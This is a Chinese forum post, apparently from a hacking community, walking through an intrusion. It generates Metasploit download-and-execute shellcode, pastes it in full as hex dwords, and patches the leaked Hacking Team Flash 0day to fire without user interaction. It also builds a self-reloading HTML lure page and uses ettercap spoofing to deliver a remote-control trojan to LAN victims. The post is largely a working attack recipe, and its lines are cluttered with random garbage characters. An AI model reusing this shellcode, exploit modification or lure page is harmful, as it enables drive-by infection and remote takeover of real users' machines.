找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1359|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

5 P3 C$ D* {* s& C* x+ f" T/ j 三、flash 0day之手工代码修改制作下载者实例入侵演示 ) h5 E8 R5 e9 c6 T3 T/ P y4 {4 K. H3 f

" _" d1 Z% ?2 r) O4 A5 h8 E/ O+ k

/ m2 p- q( C* F 利用到的工具: + [! D+ J8 Y6 b+ b

q6 u* G. Y4 l) X' ^

. S3 j; i+ o0 Z( x! J) X" _ Msf ( g) X/ \ e8 n$ x( G

) b5 v/ P6 Q% M* x

8 C& U+ ?* M$ m# u7 F. Z, x Ettercap 0 G z0 w% v7 Q4 {8 ^, y( u: R3 g

- F# A. ^/ t4 i! C

e* L5 Z! ?) L- p; o; d Adobe Flash CS6 % I8 [0 x" j5 m

; m# [% H( U1 z

3 n& J0 X6 v, p6 G Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 " ]6 `; M8 S1 j- O4 f8 f

$ U0 ^( f2 }6 _

/ D2 ^3 h; Q, [2 @5 E3 E2 v) K5 i. J 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 6 k9 V* ~' Z+ s% l5 @; W0 t! S9 f

5 c, u' F7 Y& T% D2 a

5 Y8 y% b+ e: ]* q 如图: ! S6 h: S% l$ f! }) h+ W9 f# j

" g$ ^$ n/ b: b8 B

' R- {+ `' x! j+ R" q   / x) D: {5 n7 r0 ]6 k9 ]! D

( K! X8 n* G8 I; ^

) \3 }' W* y& [4 C& I6 p   ! E5 \# e. u/ N

7 y0 f- F9 f4 Y! R& g! c

1 v! C1 o. n! t! P* U5 D9 K4 W d 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ; n9 W5 i/ c( s$ x. ~* M" g

2 I" Q, x3 {& m) N1 c

- |+ [! Z6 c# O! P- S+ E5 R" b   1 g) B0 q4 T! h, Q6 Y" Z& x

! C- X2 w, q" A( H6 v

& [( h$ Y( F' G2 j   ! I& u& A, S$ Z3 G5 A2 L2 v

. y7 }) M* _( ^5 @7 v

P1 L5 C- r0 R; v. L/ ?( d 然后执行generate -t dword生成shellcode,如下: 0 ]8 V+ z% o. h# A6 Q5 M

, F. V7 j( p# T7 }" g

4 x0 a) N8 \) ]- v) \   - |: U3 i6 H' g' b3 z1 Y

8 A: k$ F% u: D/ K, Y

+ M3 m6 [5 e- k2 h4 y 复制代码到文本下便于我们一会编辑flash exp,如下: 0 x! `$ U% z' X+ `$ _9 X

& H: W, G6 t9 D6 c, _0 I

( n7 R% I3 n' p$ `, D0 P 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, * x3 H; P" h1 G! o" @& b

7 H7 Z; |+ F/ C) r. K8 k7 @$ I

* h0 F7 E8 i* v- p* z5 M& C0 J- m 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, - d7 q6 v$ A: p3 t- W. m9 [

& [/ Z" S# ~! H5 Z: ?5 x6 [

4 X, O+ Y; c9 K 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 3 p5 P/ [+ x$ n2 n, V( b( Z

+ s8 ~7 P: `# [8 l& s8 M+ q, [

2 v# I; E7 R D! s Y! w: i 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, # b. f. h6 y2 J, t' ~- z, B

1 V) q' ~( r8 s

' H6 d M2 z6 |* d5 C$ C 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, / G' c- k1 @, Z+ G; n% _. F

?9 }, ?% a% k" D1 ]3 K% I

( M1 V! w4 F% u+ L- ^ 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 4 y) G0 q. D4 c z: {- b

! y/ z) x5 ^' p

' \. b$ f( }- a1 ^ 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ; F; ^7 U3 m0 ]$ H

t$ O) C' V2 c4 n: q# W- _

) D3 `; |5 M, Q D3 [* o 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 1 @3 {4 K3 J @) ]/ d/ k

% S! f, Q" K" L3 D

7 V M8 a, J3 G: w9 z 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 9 g# i# `- C# h: ~

# K y1 S! r8 `1 m

/ m0 X( ]* c; w" c7 w 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 2 s5 o' z1 N- y4 {+ ]! D3 z: M! v5 T

" k& }* n9 s* u4 m- A) b9 Y* }4 l

# K4 J& T, [' M% q, ~ 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, % X) s4 i4 o& h3 [) P6 x& _

2 f7 m( p) t; i/ V( N

& K- r; r# |: i* T' v 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, * D8 |) _' m4 m! ]* ]+ J

' Q; @/ C/ A0 ~$ D# }9 A/ e

. J1 l# j! K# O# W 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 5 V! g* j+ z' ?4 @# P# ~

- P) c5 r8 M4 s9 _6 N* \5 b3 }8 n

, A5 Q2 A% B9 h 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 6 J+ Z; G9 r! |. R$ O6 h

% ~) y, @5 g5 K

. S- ?2 M* K+ _   % [( \- s/ l h. P$ Z) s8 \* ^

1 J a) Q0 u8 W7 y* h+ h

4 }( H( k! R7 X2 J V- N7 ?   ) {: J0 j7 N5 }( \7 q2 U6 e

, I3 v4 ~. k+ z, b Y9 a2 `7 y7 D6 b

. _" `! f/ U. S, J7 Y4 ]! w, w% w+ A 下面我们来修改flash 0day exp,需要修改三个文件,分别为: : E8 {1 i! Q; S

9 O! I1 d9 P5 ?" `

8 c' d( E* ^" G+ \   7 X& U! J& S+ j

7 A5 L/ A4 O( A! ]& G8 q

9 n: n7 R/ c+ M4 D 先修改ShellWin32.as,部分源代码如图: 8 M) W3 o7 D( _/ b: ?3 \/ ^# w

7 e" e( d( M4 y8 W6 x

$ ?9 g' m) b1 d7 u' W( n: n   . s1 ^" A y. T7 W$ [' j

( ]6 Q; W) M" [2 H5 v7 p

& Y3 p6 ~+ O" K6 q3 A- |$ A 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: . \" ^& I- S. j* k" |5 H" O8 m

9 W1 b+ \3 A: V: |/ f7 t* e V; k

6 x2 D2 I0 B/ ~ w3 I% j6 ~   4 O3 N! z/ h. r X1 o/ M* Y' ^( c

# Z1 W1 p2 o5 ~, i' Y

/ ~. C* I- L' ~7 c' f 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: - w& |7 y# {9 e) p; l. j

5 C& h1 j p9 A: M

$ ?/ t1 h' n2 U5 b+ e+ w4 {   : ]" M* @: Z( G/ o0 m6 i

/ V( J1 V" q x, \

% D" v+ D' _2 h9 k% a3 c' s" X 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 8 Q* O$ o, l& F# J

$ D- A9 }6 k; p# ~" R

8 h ]. F% i1 ?: _# }7 S- y   ( r% Z; \, d; z" J6 W

& g0 ^0 ]4 n& l8 D8 E

; d, ]/ t% q" H/ Y2 J" a: I K3 D   ! e& b+ T W! v' v1 C

D' E" e! ^+ _6 T; _7 @& x7 R" h

0 v1 `) ?+ S ~" N3 f" X! n% B! X7 x2 h   ; Q7 K( v% ?: A; x" {1 F+ L5 E' [2 m

3 h! M- D- J# R5 ]8 r

, A U1 _9 M, Z: l' ] 然后点保存,下面我们来编译一下,打开 + a# V! W' o4 N$ v; R

' g; h4 M+ e9 E, S5 }- y% N

* r" V5 t2 f4 G0 v exp1.fla然后点文件-发布,看看编译没错误 J: |/ z; {, P. v) d

6 N3 l ?0 m4 ]

5 P4 q2 V; z. e' a( i8 F   ; `7 ?5 S* s/ K! K

! S, c& w% z0 j% a

6 D$ _9 w7 e/ Z+ s   ; n) B/ j8 t' m E# u! y( u9 \

/ m c* S* O5 G4 x0 B& @

4 s" K6 X: A; Q% E   & d- Y$ \( ?1 O

1 `' ]4 ]2 X- t( F) c

- Q; \0 I: D3 G& u   . t: `+ W! Y1 N5 e* J1 j

' A$ _6 A2 K% n

4 B$ k5 Q; V5 t; e$ x 然后我们把生成的 ; P" W: N1 K. P2 z. ^! [% O

R# @0 F2 S7 R& [( g% \1 Z8 ^: f

$ r# G' n1 t+ X! o5 y9 l2 T exp1.swf丢到kailinux /var/www/html下: $ ?/ f! ?& ?* P

# _" J, I3 I+ V' O+ a4 f$ i$ {

* d! |' J; `: \% ], _+ D3 ^, v 然后把这段代码好好编辑一下 9 `# |% o6 W/ M& q: _* H

+ b1 ~# {+ @: C6 g- X" D

5 v* T( I: q; t7 n+ t- j4 u' Z   4 l+ @) P* ^( M& ]% \3 [3 ~

* \2 C1 ~% H7 v# O

- [! U4 t% L H/ P   2 T/ C9 t! C! V$ l

" b! d( T- p( `; Y$ q8 h

/ O; p1 }3 Z4 R5 S* R   # l2 t5 l6 ~0 P' e+ d2 {! ~# f$ ^

: O0 a: E# Z; d- ^5 X/ _

, M; R- ]1 H: t! \   8 F# j0 W7 V5 s1 ?- C8 t8 h

) o# J! C& Q$ c3 m" E; X

, [6 c2 \" j5 a; C+ s- T   ) h# X: |/ N( M9 M

& k$ {9 E# E9 [# P" K- T+ X, a: V

/ ~" {* O: ?! }. t1 [. K5 `5 }% K9 {   & m, W2 M2 ^9 U4 S; q

4 R( O1 Z: i0 {

1 T) x ]" T7 J% k; k) E$ }! a+ d <!DOCTYPE html> : u. {8 ~3 J% F _9 W

C7 S; |0 P0 M& z

+ i( L: M- i* P0 m7 ]6 Y5 S <html> ; i$ R) g6 |3 T% M. z/ x" U

H3 r" u/ I: B1 O

+ ~+ v* H6 `7 D, B; Z, ?2 u <head> $ @% \& E5 x I, n! X+ f

o) t+ A: H, b! r ?( ~1 P7 Z/ a$ C

- O6 L! \4 G1 L' i! e/ R <meta http-equiv="Content-Type" content="text/html; % W+ _' |9 B6 V" c9 h7 m3 u5 E Y: M5 |

9 j$ K: {4 ?" m t* }! Q

4 A5 @, B3 \7 { charset=utf-8"/> ( I* \9 ?$ h5 S

# A; a; D* v7 M% ~0 e6 C

0 ]8 A4 i: x9 z6 Z. G M4 K </head> & e7 D: A: ?8 B) O' F

* R: t/ l. O& i, x

( u, C0 x! S( H- Q7 M! l4 W$ A4 s <body> 2 N) F4 B. O' H J

: D5 H2 x, p, k' P8 b$ r

& z# b3 q+ `7 V/ z) N <h2> Please wait, the requested page is loading...</h2> 2 }4 H/ G5 G, J( T3 p4 J& _) H) ~8 s

a3 f! h! ^- K3 {: r

5 N, k; f) P2 c- O3 c2 N <br> / M8 `/ t% J* y8 K7 ]

, V7 q' G$ |4 ], K: b/ q& R7 v

. T$ Y" O* ^8 N3 Z1 b0 `4 Q3 O <OBJECT # P+ s: S' a4 S. X3 S

4 H+ Z- ?! Z. a/ t3 R) c0 }. J

' P( ~- f1 o( G classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie g+ A* a Z, q, q1 ?& M

' P; _- e6 v2 w& s

2 A q8 W1 Z: B* i% X( M$ P5 y! [ VALUE="http://192.168.0.109/exp1.swf"></OBJECT> / `8 Z2 O1 k* r8 ]: G

+ f% D( S$ `6 c; e! u6 Z4 \

% q% L: v% H, F) C </body> 2 h5 h$ i, {2 @ L) D

' m' O6 u. v- l( {; W

1 A, M; }$ h$ _ R1 R! ] <script> 1 @' J# D2 S8 }6 G& U

6 Y5 w& I& W6 F. b/ O1 M2 Y! v

; | Z1 F+ u% e$ T. l7 Z     setTimeout(function () { ( T2 z' \& {* U4 n

) V7 q# e2 _8 I) |

; \# H, u" s$ s9 T! e          7 m. X& S. p& N! O0 w

' ?$ E$ `/ _/ H6 `3 ^+ R/ \$ O" o

2 o( C6 @ x3 A( b5 z window.location.reload(); 8 u' p! F+ N; y. [8 W

' d, s* u% U" L2 c& F

* R$ O5 C8 e& m- w7 ]" q" k' j     }, 10000); , Y# C1 u5 }: J! N9 b

& W9 s: z" H* X6 q, |

# A, n* W* S( O5 Q- c, q   & Q# P* d3 }" n- o

- X3 V6 q9 J; m" U, o! S

: G+ @4 B; ]' |& D </script> ' J# k+ y2 e+ p4 S& k7 I) @" A

) l* K5 J8 I# C# ^, B7 S: T" G

/ A/ S* w! W8 B; f: i1 z; c _ </html> 3 _" C* z) B8 f, q# N$ |2 D

- ]- ?5 V- p* o3 W

" I# i9 R/ e1 a& [   2 j7 B7 b/ ?+ ]

! _1 h, M( b e' k

6 v7 H, ?+ C& O7 C 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ( Z, ~4 s3 T! r8 f4 ?

# J3 S6 }2 g/ Z9 x4 U

' L& w% L! w" J: d: T" E- T# }: [   ' p M9 ]( h9 g9 x( ]1 W. V0 Z

S0 k: ^7 I9 d; `

5 P, H6 \2 S1 V$ O   ; |8 K& |3 C/ [

& d. Y+ M: `& H# D. r) j6 |# |$ g; |/ ?

: d& J* Q u: x2 f5 x   8 d- p' y' }- {: T9 \! ~

: ^# P2 g4 z) B1 @4 |+ e

: g+ g) r, X/ F$ O0 j   & t. t9 o4 @8 O' |- w& B5 Q

0 ]) m* D2 B! F/ J: c8 ^4 D: S

9 c2 l$ t8 L f5 K, l% k1 j( ~   2 J- Q2 E4 U* B i

* k2 b4 j8 H5 Q8 Y1 K' T. A& s" f

: Q- X4 W' t( B 下面我们用ettercap欺骗如图: - W) T$ `2 P# H& ?5 s8 y

Z7 o3 ^/ Z/ |) B" Z3 p

7 w g w8 u9 u3 G( p( j   6 G: M( d$ l/ i/ r. I

2 {9 b* n+ F3 g

4 p* @1 n9 E& h, V% b# a   , F4 W9 Y2 v1 U2 u( Y' |

]6 M/ }5 j3 v

- d, Z, I& _4 O4 n 下面我们随便访问个网站看看: 8 Y4 R- {- }( q' l: K

7 {# \! U) Q3 f) r7 _% ^' y

0 P8 d( V. i/ A T; d2 ?8 U) ~ 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 0 |3 P* n$ n6 j4 Y5 [0 O. r- c

4 b O8 F# u% y4 f) w5 Y

9 O6 u+ C$ W' [2 B. ~' W* b, R9 |" \   " ^ K8 o, O: s7 f. j5 N/ R; b

) @- A! [( o$ E+ {

. C" i; D, ?6 I& y9 E9 x. a8 Y$ o 我们看另一台, , t" I1 u6 a! |* l! w' e( D+ v

1 H m' Z( `! A; n8 w' u

6 H& G @7 ?! L! _% b$ y 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 - l2 {& b! |5 S- u2 ?

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表